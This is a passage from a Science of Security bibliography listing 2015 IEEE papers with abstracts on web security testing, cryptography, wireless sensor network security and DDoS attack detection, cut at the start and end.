Keywords: Internet; Java; application program interfaces; hypermedia markup languages; mobile computing; smart phones; DroidCIA; Google Play; HTML5 text box injection channel; HTML5-based mobile application; JavaScript API; code injection attack; smart phone; web applications; Data mining; electronic mail; Google; HTML; Mobile communication; Operating systems; Smart phones (ID#: 16-9193)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345385&isnumber=7345233

 

Bozic, J.; Wotawa, F., “PURITY: A Planning-based secURITY Testing Tool,” in Software Quality, Reliability and Security - Companion (QRS-C), 2015 IEEE International Conference on, vol., no., pp. 46–55, 3–5 Aug. 2015. doi:10.1109/QRS-C.2015.19
Abstract: Despite sophisticated defense mechanisms security testing still plays an important role in software engineering. Because of their latency, security flaws in web applications always bear the risk of being exploited sometimes in the future. In order to avoid potential damage, appropriate prevention measures should be incorporated in time and in the best case already during the software development cycle. In this paper, we contribute to this goal and present the PURITY tool for testing web applications. PURITY executes test cases against a given website. It detects whether the website is vulnerable against some of the most common vulnerabilities, i.e., SQL injections and cross-site scripting. The goal is to resemble a malicious activity by following typical sequences of actions potentially leading to a vulnerable state. The test execution proceeds automatically. In contrast to other penetration testing tools, PURITY relies on planning. Concrete test cases are obtained from a plan, which in turn is generated from specific initial values and given actions. The latter are intended to mimic actions usually performed by an attacker. In addition, PURITY also allows a tester to configure input parameters and also tests a website in a manual manner.
Keywords: Internet; Web sites; program testing; security of data; software tools; PURITY; Web application testing; Web applications; Web site testing; defense mechanisms; malicious activity; planning-based security testing tool; prevention measures; security flaws; software development cycle; software engineering; test execution; Concrete; HTML; Java; Planning; Security; Testing; Uniform resource locators; Model-based testing; Testing tool; planning problem; security testing (ID#: 16-9194)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322124&isnumber=7322103
 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Cryptography and Data Security 2015

 

 
SoS Logo

Cryptography and Data Security

2015

 

This collection of articles addresses problems in cryptography and data security related to the Science of Security hard problems of metrics, resilience, composability, and human factors. The work cited here was presented in 2015.



Coulibaly, Y.; Al-Kilany, A.A.I.; Latiff, M.S.A.; Rouskas, G.; Mandala, S.; Razzaque, M.A., “Secure Burst Control Packet Scheme for Optical Burst Switching Networks,” in Broadband and Photonics Conference (IBP), 2015 IEEE International, vol., no.,
pp. 86–91, 23–25 April 2015. doi:10.1109/IBP.2015.7230771
Abstract: Optical networks are the most adequate platform for the transport of ever increasing bandwidth-hungry applications and services (BwGAS). Additionally, these networks cope with the continuous growth of the number of Internet users. Optical Burst Switching (OBS) paradigm is expected to be the backbone infrastructure of near-future all-optical Internet. In OBS, data and control packet known as burst header packet (BHP) are sent out of band (i.e., control packets and data bursts are carried by different channels) and it is sent ahead of the data burst to reserve necessary network resources for the corresponding burst. After the elapse of a predetermined time known as offset time, the data burst is sent with the hope that, the control packet was able to make necessary reservations. Sending the BHP ahead of the burst exposes the burst to different security challenges, particularly data burst redirection and denial of service attacks. If the BHP is compromised the corresponding burst will definitely be compromised. Less efforts have been dedicated to investigate control packet security issues in OBS. In this paper, we propose and evaluate a solution to address Data Burst Redirection (DBR) Attack in OBS networks. The solution is designed based on Rivest-Shamir-Adleman (RSA) public-key encryption algorithm. We evaluated the algorithm via computer simulation. Evaluation metrics are burst loss ratio and throughput. The obtained results demonstrate that, the proposed algorithm has succeeded in protecting the network against DBR attacks reducing the number of compromised BHP. In the future, the authors will work on denial of service issues considering reliability aspects.
Keywords: computer network security; optical burst switching; public key cryptography; telecommunication control; BwGAS; Internet users; Rivest-Shamir-Adleman public-key encryption; backbone infrastructure; bandwidth-hungry applications and services; burst header packet; computer simulation; control packet security; data burst redirection attack; denial of service attacks; optical burst switching networks; secure burst control packet scheme; Computer crime; Optical packet switching; Public key; Receivers; Throughput (ID#: 16-9195)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7230771&isnumber=7230751

 

Dworak, J.; Crouch, A., “A Call to Action: Securing IEEE 1687 and the Need for an IEEE Test Security Standard,” in VLSI Test Symposium (VTS), 2015 IEEE 33rd, vol., no., pp. 1–4, 27–29 April 2015. doi:10.1109/VTS.2015.7116256
Abstract: Today’s chips often contain a wealth of embedded instruments, including sensors, hardware monitors, built-in self-test (BIST) engines, etc. They may process sensitive data that requires encryption or obfuscation and may contain encryption keys and ChipIDs. Unfortunately, unauthorized access to internal registers or instruments through test and debug circuitry can turn design for testability (DFT) logic into a backdoor for data theft, reverse engineering, counterfeiting, and denial-of-service attacks. A compromised chip also poses a security threat to any board or system that includes that chip, and boards have their own security issues. We will provide an overview of some chip and board security concerns as they relate to DFT hardware and will briefly review several ways in which the new IEEE 1687 standard can be made more secure. We will then discuss the need for an IEEE Security Standard that can provide solutions and metrics for providing appropriate security matched to the needs of a real world environment.
Keywords: built-in self test; cryptography; design for testability; reverse engineering; BIST; ChipID; DFT hardware; DFT logic; IEEE 1687; IEEE test security standard; built-in self-test; data theft; denial-of-service attacks; design for testability; embedded instruments; encryption keys; hardware monitors; internal registers; Encryption; Instruments; Microprogramming; Ports (Computers); Registers; Standards; DFT; IEEE Standard; IJTAG; JTAG; LSIB; P1687; lock; scan; security; trap (ID#: 16-9196)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116256&isnumber=7116233

 

Banerjee, P.; Chatterjee, T.; DasBit, S., “LoENA: Low-Overhead Encryption Based Node Authentication in WSN,” in Advances in Computing, Communications and Informatics (ICACCI), 2015 International Conference on, vol., no., pp. 2126–2132, 10–13 Aug. 2015. doi:10.1109/ICACCI.2015.7275931
Abstract: Nodes in a wireless sensor network (WSN) are susceptible to various attacks primarily due to their nature of deployment and unguarded communication. Therefore, providing security in such networks is of utmost importance. The main challenge to achieve this is to make the security solution light weight so that it is feasible to implement in such resource constrained nodes in WSN. So far, data authentication has drawn more attention than the node authentication in WSN. A robust security solution for such networks must also facilitate node authentication. In this paper, a low overhead encryption based security solution is proposed for node authentication. The proposed node authentication scheme at the sender side consists of three modules viz. dynamic key generation, encryption and embedding of key hint. Performance of the scheme is primarily analyzed by using two suitably chosen parameters such as cracking probability and cracking time. This evaluation guides us in fixing the size of the unique id of a node so that the scheme incurs low-overhead as well as achieves acceptable robustness. The performance is also compared with a couple of recent works in terms of computation and communication overheads and that confirms our scheme’s supremacy over competing schemes in terms of both the metrics.
Keywords: cryptography; probability; wireless sensor networks; LoENA; WSN; cracking probability; cracking time; data authentication; low-overhead encryption based node authentication; wireless sensor network; Authentication; Encryption; Heuristic algorithms; Receivers; Wireless sensor networks; Wireless sensor network; authentication; encryption; sybil attack; tampering
(ID#: 16-9197)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275931&isnumber=7275573

 

Salve, V.B.; Ragha, L.; Marathe, N., “AODV Based Secure Routing Algorithm Against Sinkhole Attack in Wirelesses Sensor Networks,” in Electrical, Computer and Communication Technologies (ICECCT), 2015 IEEE International Conference on, vol., no., pp. 1–7, 5–7 March 2015. doi:10.1109/ICECCT.2015.7226170
Abstract: Wireless sensor Networks consist of small nodes with sensing, computation and wireless communication wireless capabilities. These Networks are used in many applications in military, ecological, and health-related areas. These applications often include the monitoring of sensitive information therefore security is important in WSNs. Routing attacks can have devastating effect on wireless Sensor Network and present a major challenge when designing security mechanisms. Sinkhole attack is the most destructive routing attack for these networks, it enable many other attack. In this type of attack sinkhole node tries to attract data to itself by convincing neighbors through broadcasting fake routing information. This paper present an AODV based secure routing algorithm based on mobile agent for detecting the malicious node in sinkhole attack. The algorithm detects sinkhole node by finding the difference of nodes sequence numbers using threshold value. It also shows performance evaluation of AODV with the enhanced secure routing algorithm and existing secure routing algorithm through simulations, which confirmed the effectiveness and accuracy of the algorithm by considering performance metrics as Throughput, PDR and Packet loss. Simulation is carried out using simulator NS2.
Keywords: routing protocols; telecommunication security; wireless sensor networks; AODV based secure routing algorithm; NS2 simulator; destructive routing attack; fake routing information; malicious node detection; mobile agent; packet loss; performance evaluation; performance metrics; security mechanisms;  Cryptography; Mobile agents; Routing; Wireless sensor networks; AODV; Mobile Agent; Sinkhole Attack; Threshold Value; Wireless sensor Networks (ID#: 16-9198)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7226170&isnumber=7225915

 

Ennahbaoui, M.; Idrissi, H.; El Hajji, S., “Secure and Flexible Grid Computing Based Intrusion Detection System Using Mobile Agents and Cryptographic Traces,” in Innovations in Information Technology (IIT), 2015 11th International Conference on, vol., no., pp. 314–319, 1–3 Nov. 2015. doi:10.1109/INNOVATIONS.2015.7381560
Abstract: Grid Computing is one of the new and innovative information technologies that attempt to make resources sharing global and more easier. Integrated in networked areas, the resources and services in grid are dynamic, heterogeneous and they belong to multiple spaced domains, which effectively enables a large scale collection, sharing and diffusion of data. However, grid computing stills a new paradigm that raises many security issues and conflicts in the computing infrastructures where it is integrated. In this paper, we propose an intrusion detection system (IDS) based on the autonomy, intelligence and independence of mobile agents to record the behaviors and actions on the grid resource nodes to detect malicious intruders. This is achieved through the use of cryptographic traces associated with chaining mechanism to elaborate hashed black statements of the executed agent code, which are then compared to depict intrusions. We have conducted experiments basing three metrics: network load, response time and detection ability to evaluate the effectiveness of our proposed IDS.
Keywords: cryptography; grid computing; mobile agents; IDS; chaining mechanism; cryptographic traces; data collection; data diffusion; data sharing; detection ability metric; intrusion detection system; mobile agents; network load metric; resources sharing; response time metric; security issues; Computer architecture; Cryptography; Grid computing; Intrusion detection; Mobile agents; Monitoring (ID#: 16-9199)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381560&isnumber=7381480

 

Jain, M.; Lenka, S.K., “Secret Data Transmission Using Vital Image Steganography over Transposition Cipher,” in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, vol., no., pp. 1026–1029, 8–10 Oct. 2015. doi:10.1109/ICGCIoT.2015.7380614
Abstract: The idea behind this paper describes a modality about secret interface over the globalization of the communication over the world. To accomplish this phenomenon, two varieties of security mechanism, cryptography and steganography is being applied. At the former stage, encryption is being provided to secret plain text using Vernam cipher (One-Time Pad) transposition technique, since Vernam cipher show good performance metrics in terms of less CPU running time, file size same after encryption and strong avalanche effect compare with all transposition cipher. And at the later stage, it transform cipher text into bytes and divides each byte into pairs of bits and assigns the decimal values to each pairs, which is known as master variable, master variable value range will be vary between 0 to 3. Depending upon the master patchy value, add that cipher text in the career image at Least Significant Bit (LSB) 6th and 7th bit location or 7th and 8th bit location or 7th and 6th or 8th and 7th bit location. Which shows the embedding location dynamicity of the algorithm depends upon dynamically changed master variable value. After completion of embedding and sending the stego image to the receiver side, retrieving process of the cipher text from the said locations will be done. And then decryption process to get the secret plain text back will be performed using the Vernam cipher transposition algorithms. In this we provide robust image steganography. Performance analysis observed using MSE and PSNR value.
Keywords: cryptography; image coding; mean square error methods; steganography; LSB; MSE; PSNR; Vernam cipher transposition algorithms; cipher text; image steganography; least significant bit; secret data transmission; secret plain text; security mechanism; stego image; Ciphers; Heuristic algorithms; MATLAB; Payloads; Performance analysis; Yttrium; Vernam cipher; decryption; embedding; encryption (ID#: 16-9200)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380614&isnumber=7380415

 

Kalaivani, K.; Anjalipriya, V.; Sivakumar, R.; Srimeena, R., “An Efficient Bio-Key Management Scheme for Telemedicine Applications,” in Technological Innovation in ICT for Agriculture and Rural Development (TIAR), 2015 IEEE, vol., no.,
pp. 122–126, 10–12 July 2015. doi:10.1109/TIAR.2015.7358543
Abstract: Medical sensor networks play a vital role for real-time health care monitoring of telemedicine based applications. Telemedicine provide specialized healthcare consultation to patients in remote locations. We use electronic information and communication technologies to provide and support healthcare when the distance separate the participants. In order to ensure the privacy and security of patient’s critical health information, it is essential to provide efficient cryptography scheme. This paper presents a novel Mamdani based Bio-Key Management (MBKM) technique, which assures real time health care monitoring without any overhead. We present the simulation results to show that the proposed MBKM scheme can achieve greater security in terms of performance metrics such as False Match Rate (FMR), False Non Match Rate (FNMR), and Genuine Acceptance Rate (GAR) than other recent existing approaches.
Keywords: biomedical telemetry; body sensor networks; cryptography; data privacy; electrocardiography; electromyography; health care; medical computing; patient monitoring; telemedicine; FMR; FNMR; GAR; MBKM; Mamdani based biokey management technique; communication technologies; cryptography scheme; electronic information; false match rate; false nonmatch rate; genuine acceptance rate; medical sensor networks; patient critical health information privacy; patient critical health information security; performance metrics; real time health care monitoring; real-time health care monitoring; remote locations; specialized healthcare consultation; telemedicine based applications; Electrocardiography; Magnetic resonance; Medical services; Security; Telemedicine; Yttrium; Healthcare; Key Management; Medical sensor networks; security (ID#: 16-9201)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7358543&isnumber=7358472

 

Baokang Zhao; Ziling Wei; Bo Liu; Jinshu Su; Ilsun You, “Providing Adaptive Quality of Security in Quantum Networks,” in Heterogeneous Networking for Quality, Reliability, Security and Robustness (QSHINE), 2015 11th International Conference on, vol., no., pp. 440–445, 19–20 Aug. 2015. doi: (not provided)
Abstract: Recently, several Quantum Key Distribution (QKD) networks, such as Tokyo QKD, SECOQC, have been built to evaluate the quantum based OTP (One Time Pad) secure communication. As an ideal unconditional secure technique, OTP requires the key rate the same as the information rate. However, comparing with high speed information traffic (Gbps), the key generation rate of QKD is very poor (Kbps). Therefore, in practical QKD networks, it is difficult to support numerous applications and multiple users simultaneously. To address this issue, we argue that it is more practical to provide quality of security instead of OTP in quantum networks. We further propose ASM, an Adaptive Security Selection Mechanism for quantum networks based on the Analytic Hierarchy Process (AHP). In ASM, services can select an appropriate encryption algorithm that satisfies the proper security level and performance metrics under the limit of the key generation rate. We also implement ASM under our RT-QKD platform, and evaluate its performance. Experimental results demonstrate that ASM can select the optimal algorithm to meet the requirement of security and performance under an acceptable cost.
Keywords: analytic hierarchy process; data privacy; quantum cryptography; telecommunication security; telecommunication traffic; AHP; ASM; OTP; RT-QKD platform; SECOQC; Tokyo; adaptive security selection mechanism; one time pad; quantum key distribution network; secure communication; Algorithm design and analysis; Analytic hierarchy process; Encryption; Information rates; Quantum computing; Real-time systems; Analytic Hierarchy Process; Quality of security; Quantum Key Distribution
(ID#: 16-9202)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7332609&isnumber=7332527

 

Dang Hai Van; Nguyen Dinh Thuc, “A Privacy Preserving Message Authentication Code,” in IT Convergence and Security (ICITCS), 2015 5th International Conference on, vol., no., pp. 1–4, 24–27 Aug. 2015. doi:10.1109/ICITCS.2015.7292927
Abstract: In this paper, we propose a new message authentication code which can preserve privacy of data. The proposed mechanism supports to verify data integrity from only partly information of the original data. In addition, it is proved to be chosen-message-attack secure and privacy-preserving. We also conduct an experiment to compare its computation cost with a hash message authentication code.
Keywords: cryptography; data integrity; data privacy; message authentication; hash message authentication code; privacy of data; privacy preserving message authentication code; Cryptography; Data privacy; Memory; Message authentication; Privacy; Servers (ID#: 16-9203)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292927&isnumber=7292885

 

Backes, M.; Barbosa, M.; Fiore, D.; Reischuk, R.M., “ADSNARK: Nearly Practical and Privacy-Preserving Proofs on Authenticated Data,” in Security and Privacy (SP), 2015 IEEE Symposium on, vol., no., pp. 271–286, 17–21 May 2015. doi:10.1109/SP.2015.24
Abstract: We study the problem of privacy-preserving proofs on authenticated data, where a party receives data from a trusted source and is requested to prove computations over the data to third parties in a correct and private way, i.e., The third party learns no information on the data but is still assured that the claimed proof is valid. Our work particularly focuses on the challenging requirement that the third party should be able to verify the validity with respect to the specific data authenticated by the source — even without having access to that source. This problem is motivated by various scenarios emerging from several application areas such as wearable computing, smart metering, or general business-to-business interactions. Furthermore, these applications also demand any meaningful solution to satisfy additional properties related to usability and scalability. In this paper, we formalize the above three-party model, discuss concrete application scenarios, and then we design, build, and evaluate ADSNARK, a nearly practical system for proving arbitrary computations over authenticated data in a privacy-preserving manner. ADSNARK improves significantly over state-of-the-art solutions for this model. For instance, compared to corresponding solutions based on Pinocchio (Oakland’13), ADSNARK achieves up to 25x improvement in proof-computation time and a 20x reduction in prover storage space.
Keywords: computational complexity; cryptography; data privacy; message authentication; trusted computing; ADSNARK; authenticated data; general business-to-business interactions; privacy-preserving proofs; proof-computation time; prover storage space; scalability; smart metering; third party; three-party model; trusted source; usability; wearable computing; Computational modeling; Cryptography; Data privacy; Logic gates; Polynomials; Wires; authentication; privacy (ID#: 16-9204)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163031&isnumber=7163005

 

Alshinina, R.; Elleithy, K., “An Efficient Message Authentication and Source Privacy with a Hidden Generator Point Based on ECC,” in Systems, Applications and Technology Conference (LISAT), 2015 IEEE Long Island, vol., no., pp. 1–6, 1–1 May 2015. doi:10.1109/LISAT.2015.7160220
Abstract: Wireless Sensor Networks have been widely used by researchers in different personal and organizational applications. Recently, WSN has become the major focus of researchers to establish a secure network against malicious node. The security of WSN can be subjected to threats by attackers. In order to limit these threats on WSNs, Elliptic Curve Cryptography (ECC) introduces great features such as smaller key size, less parameters, and higher intensity compared with RSA and public key algorithms. In this paper, we proposed an ECC based approach using a unique authentication message and source privacy through a hidden generator point. This scheme contains the initialization phase, registration phase, and authentication phase. These phases were introduced to develop an efficient algorithm, decrease the overhead, and increase the authentication between nodes. The scheme allows many nodes to transfer unlimited messages without any imposed threshold and guarantee the message source privacy.
Keywords: data privacy; message authentication; public key cryptography; wireless sensor networks; ECC; WSN security; authentication phase; elliptic curve cryptography; hidden generator point; initialization phase; malicious node; message source privacy; registration phase; secure network; unique authentication message; wireless sensor networks; Authentication; Elliptic curve cryptography; Generators; Protocols; Receivers; Wireless sensor networks; Anonymous Message. Hidden Generator Point; Authentication; Elliptic curve (EC); Initialization; Registration; Secure Privacy; Shared Secret key; Wireless Sensor Network (WSN) (ID#: 16-9205)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160220&isnumber=7160171

 

Yunpeng Xiao; Yaru Zhang, “Secure Top-K Query Scheme in Wireless Sensor Networks,” in Software Engineering and Service Science (ICSESS), 2015 6th IEEE International Conference on, vol., no., pp. 516–519, 23–25 Sept. 2015. doi:10.1109/ICSESS.2015.7339110
Abstract: Data privacy preserving in wireless sensor network has attracted more and more attentions. This paper proposes a secure top-k query scheme in wireless sensor networks (STQ). STQ uses symmetric encryption to preserve data privacy. To verify completeness of query result, STQ uses the improved hashed message authentication coding function to create a chaining relationship by binding ordered adjacent data. Theoretical analysis and simulation results confirm the security and efficiency of STQ.
Keywords: cryptography; data privacy; query processing; wireless sensor networks; STQ; data privacy; improved hashed message authentication coding function; secure top-k query scheme; symmetric encryption; wireless sensor networks; Top-k query; Wireless sensor networks; data privacy preserving; improved hashed message authentication coding (ID#: 16-9206)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7339110&isnumber=7338993

 

Surv, N.; Wanve, B.; Kamble, R.; Patil, S.; Katti, J., “Framework for Client Side AES Encryption Technique in Cloud Computing,” in Advance Computing Conference (IACC), 2015 IEEE International, vol., no., pp. 525–528, 12–13 June 2015. doi:10.1109/IADCC.2015.7154763
Abstract: Now a days, cloud computing is most popular network in world. Cloud computing provides resource sharing and online data storage for the end users. In existed cloud computing systems there are many security issues. So, security becomes essential part for the data which is stored on cloud. To solve this problem we have proposed this paper. This paper presents client side AES encryption and decryption technique using secret key. AES encryption and decryption is high secured and fastest technique. Client side encryption is an effective approach to provide security to transmitting data and stored data. This paper proposed user authentication to secure data of encryption algorithm with in cloud computing. Cloud computing allows users to use browser without application installation and access their data at any computer using browser. This infrastructure guaranteed to secure the information in cloud server.
Keywords: cloud computing; message authentication; private key cryptography; resource allocation; storage management; client side AES decryption; client side AES encryption technique; cloud computing systems; cloud server; online data storage; resource sharing; secret key; security issues; user authentication; Ciphers; Cloud computing; Data privacy; Databases; Encryption; AES Algorithm; Cloud Computing; Cloud Security; Cryptography (ID#: 16-9207)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7154763&isnumber=7154658

 

Thomas, M.; Panchami, V., “An Encryption Protocol for End-to-End Secure Transmission of SMS,” in Circuit, Power and Computing Technologies (ICCPCT), 2015 International Conference on, vol., no., pp. 1–6, 19–20 March 2015. doi:10.1109/ICCPCT.2015.7159471
Abstract: Short Message Service (SMS) is a process of transmission of short messages over the network. SMS is used in daily life applications including mobile commerce, mobile banking, and so on. It is a robust communication channel to transmit information. SMS pursue a store and forward way of transmitting messages. The private information like passwords, account number, passport number, and license number are also send through message. The traditional messaging service does not provide security to the message since the information contained in the SMS transmits as plain text from one mobile phone to other. This paper explains an efficient encryption protocol for securely transmitting the confidential SMS from one mobile user to other which serves the cryptographic goals like confidentiality, authentication and integrity to the messages. The Blowfish encryption algorithm gives confidentiality to the message, the EasySMS protocol is used to gain authentication and MD5 hashing algorithm helps to achieve integrity of the messages. Blowfish algorithm utilizes only less battery power when compared to other encryption algorithms. The protocol prevents various attacks, including SMS disclosure, replay attack, man-in-the middle attack and over the air modification.
Keywords: cryptographic protocols; data integrity; data privacy; electronic messaging; message authentication; mobile radio; Blowfish encryption algorithm; SMS disclosure; encryption protocol; end-to-end secure transmission; man-in-the middle attack; message authentication; message confidentiality; message integrity; mobile phone; over the air modification; replay attack; short message service; Authentication; Encryption; Mobile communication; Protocols; Throughput; Asymmetric Encryption; Cryptography; Secure Transmission; Symmetric Encryption (ID#: 16-9208)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7159471&isnumber=7159156

 

Govinda, K.; Prasanna, S., “A Generic Image Cryptography Based on Rubik’s Cube,” in Soft-Computing and Networks Security (ICSNS), 2015 International Conference on, vol., no., pp. 1–4, 25–27 Feb. 2015. doi:10.1109/ICSNS.2015.7292383
Abstract: Security is one of the core areas of study of the IT industry. In this era, where our information represents us, information security is no more a simple non-functional requirement. In order to define and determine security trends and techniques with respect to evolving data that impacts our life every day, Here in this paper we define and design procedures and schemes that provides privacy, security and authenticated data that flows through the network, stored in cloud and the data that is available everywhere all the time serving, homo sapiens by full filling their requirements.
Keywords: cloud computing; cryptography; data privacy; image processing; message authentication; storage management; IT industry; Rubik’s cube; authenticated data; cloud storage; data security; generic image cryptography; information security; nonfunctional requirement; Chaotic communication; Ciphers; Encryption; Signal processing algorithms; Cryptography; Decryption; Encryption; Game of life; Rubik’s Cube (ID#: 16-9209)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292383&isnumber=7292366

 

Fan Yan; Yang Jian-Wen; Cheng Lin, “Computer Network Security and Technology Research,” in Measuring Technology and Mechatronics Automation (ICMTMA), 2015 Seventh International Conference on, vol., no., pp. 293–296, 13–14 June 2015. doi:10.1109/ICMTMA.2015.77
Abstract: The rapid development of computer network system brings both a great convenience and new security threats for users. Network security problem generally includes network system security and data security. Specifically, it refers to the reliability of network system, confidentiality, integrity and availability of data information in the system. Network security problem exists through all the layers of the computer network, and the network security objective is to maintain the confidentiality, authenticity, integrity, dependability, availability and audit-ability of the network. This paper introduces the network security technologies mainly in detail, including authentication, data encryption technology, firewall technology, intrusion detection system (IDS), antivirus technology and virtual private network (VPN). Network security problem is related to every network user, so we should put a high value upon network security, try to prevent hostile attacks and ensure the network security.
Keywords: computer viruses; cryptography; data integrity; data privacy; firewalls; message authentication; IDS; VPN; antivirus technology; authentication; computer network security; data encryption technology; data information availability; data information confidentiality; data information integrity; data security; firewall technology; hostile attack prevention; intrusion detection system; network system reliability; technology research; virtual private network; Authentication; Communication networks; Encryption; Firewalls (computing); Virtual private networks; Firewall; Intrusion Detection System; Network Security (ID#: 16-9210)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7263569&isnumber=7263490

 

Kester, Q.-A.; Nana, L.; Pascu, A.C.; Gire, S.; Eghan, J.M.; Quaynor, N.N., “A Security Technique for Authentication and Security of Medical Images in Health Information Systems,” in Computational Science and Its Applications (ICCSA), 2015 15th International Conference on, vol., no., pp. 8–13, 22–25 June 2015. doi:10.1109/ICCSA.2015.8
Abstract: Medical images stored in health information systems, cloud or other systems are of key importance. Privacy and security needs to be guaranteed for such images through encryption and authentication processes. Encrypted and watermarked images in this domain needed to be reversible so that the plain image operated on in the encryption and watermarking process can be fully recoverable due to the sensitivity of the data conveyed in medical images. In this paper, we proposed a fully recoverable encrypted and watermarked image processing technique for the security of medical images in health information systems. The approach is used to authenticate and secure the medical images. Our results showed to be very effective and reliable for fully recoverable images.
Keywords: cryptography; image watermarking; medical image processing; medical information systems; message authentication; authentication process; encrypted image; encryption process; health information system; medical image authentication; medical image security; security technique; watermarked image; watermarking process; Encryption; Information systems; Magnetic resonance imaging; Medical diagnostic imaging; authentication; health information systems; medical images; recoverable; security (ID#: 16-9211)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166157&isnumber=7166063

 

Khan, M.F.F.; Sakamura, K., “Fine-Grained Access Control to Medical Records in Digital Healthcare Enterprises,” in Networks, Computers and Communications (ISNCC), 2015 International Symposium on, vol., no., pp. 1–6, 13–15 May 2015. doi:10.1109/ISNCC.2015.7238590
Abstract: Adopting IT as an integral part of business and operation is certainly making the healthcare industry more efficient and cost-effective. With the widespread digitalization of personal health information, coupled with big data revolution and advanced analytics, security and privacy related to medical data — especially ensuring authorized access thereto — is facing a huge challenge. In this paper, we argue that a fine-grained approach is needed for developing access control mechanisms contingent upon various environmental and application-dependent contexts along with provision for secure delegation of access-control rights. In particular, we propose a context-sensitive approach to access control, building on conventional discretionary access control (DAC) and role-based access control (RBAC) models. Taking a holistic view to access control, we effectively address the precursory authentication part as well. The eTRON architecture — which advocates use of tamper-resistant chips equipped with functions for mutual authentication and encrypted communication — is used for authentication and implementing the DAC-based delegation of access-control rights. For realizing the authorization and access decision, we used the RBAC model and implemented context verification on top of it. Our approach closely follows regulatory and technical standards of the healthcare domain. Evaluation of the proposed system in terms of various security and performance showed promising results.
Keywords: authorisation; cryptography; health care; medical computing; message authentication; DAC-based delegation; RBAC models; access decision; advanced analytics; application-dependent contexts; authorization; big data revolution; context verification; context-sensitive approach; digital healthcare enterprises; discretionary access control models; eTRON architecture; encrypted communication; environmental contexts; fine-grained access control; healthcare industry; medical records; mutual authentication; personal health information; precursory authentication; regulatory standards; role-based access control models; technical standards; Authentication; Authorization; Context; Cryptography; Medical services; DAC; RBAC; access control; authentication; context-awareness; eTRON; healthcare enterprise; security (ID#: 16-9212)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7238590&isnumber=7238567
 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Distributed Denial of Service Attack Detection 2015

 

 
SoS Logo

Distributed Denial of Service Attack Detection

2015

 

Distributed Denial of Service Attacks (DDoS) continue to be among the most prolific forms of attack against information systems. According to the NSFOCUS DDoS Threat Report 2013 released on March 25, 2014, DDoS attacks occur at the rate of 28 per hour. (See: http://en.nsfocus.com/2014/SecurityReport_0320/165.html). Research into methods of response and mitigation is also substantial, as the articles presented here show. This work was presented in 2015.



Saboor, A.; Aslam, B., “Analyses of Flow Based Techniques to Detect Distributed Denial of Service Attacks,” in Applied Sciences and Technology (IBCAST), 2015 12th International Bhurban Conference on, vol., no., pp. 354–362, 13–17 Jan. 2015. doi:10.1109/IBCAST.2015.7058529
Abstract: Distributed Denial of Service (DDoS) attacks comprise of sending huge network traffic to a victim system using multiple systems. Detecting such attacks has gained much attention in current literature. Studies have shown that flow-based anomaly detection mechanisms give promising results as compared to typical signature based attack detection mechanisms which have not been able to detect such attacks effectively. For this purpose, a variety of flow-based DDoS detection algorithms have been put forward. We have divided the flow-based DDoS attack detection techniques broadly into two categories namely, packet header based and mathematical formulation based. Analyses has been done for two techniques one belonging to each category. The paper has analyzed and evaluated these with respect to their detection accuracy and capability. Finally, we have suggested improvements that can be helpful to give results better than both the previously proposed algorithms. Furthermore, our findings can be applied to DDoS detection systems for refining their detection capability.
Keywords: computer network security; mathematical analysis; telecommunication traffic; flow-based anomaly detection mechanisms; flow-based distributed denial of service attack detection techniques; mathematical formulation; multiple systems; network traffic; packet header; signature based attack detection mechanisms; victim system; Correlation; Correlation coefficient; IP networks; Distributed Denial of Service Attack; Exploitation Tools; Flow-based attack detection; Intrusion Detection; cyber security (ID#: 16-9083)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7058529&isnumber=7058466

 

Katkar, V.; Zinjade, A.; Dalvi, S.; Bafna, T.; Mahajan, R., “Detection of DoS/DDoS Attack Against HTTP Servers Using Naive Bayesian,” in Computing Communication Control and Automation (ICCUBEA), 2015 International Conference on, vol., no.,
pp. 280–285, 26–27 Feb. 2015. doi:10.1109/ICCUBEA.2015.60
Abstract: With a growth of E-commerce and availability of resources over internet number of attacks on servers providing these services, resources are also increased. Denial of service and Distributed Denial of Service are most widely launched attacks against these servers for preventing legitimate users from accessing these services. This paper presents architecture of offline Signature based Network Intrusion Detection System for detection of Denial/Distributed Denial of Service attacks against HTTP servers using distributed processing and Naïve Bayesian classifier. Experimental results are provided to prove the efficiency of proposed architecture.
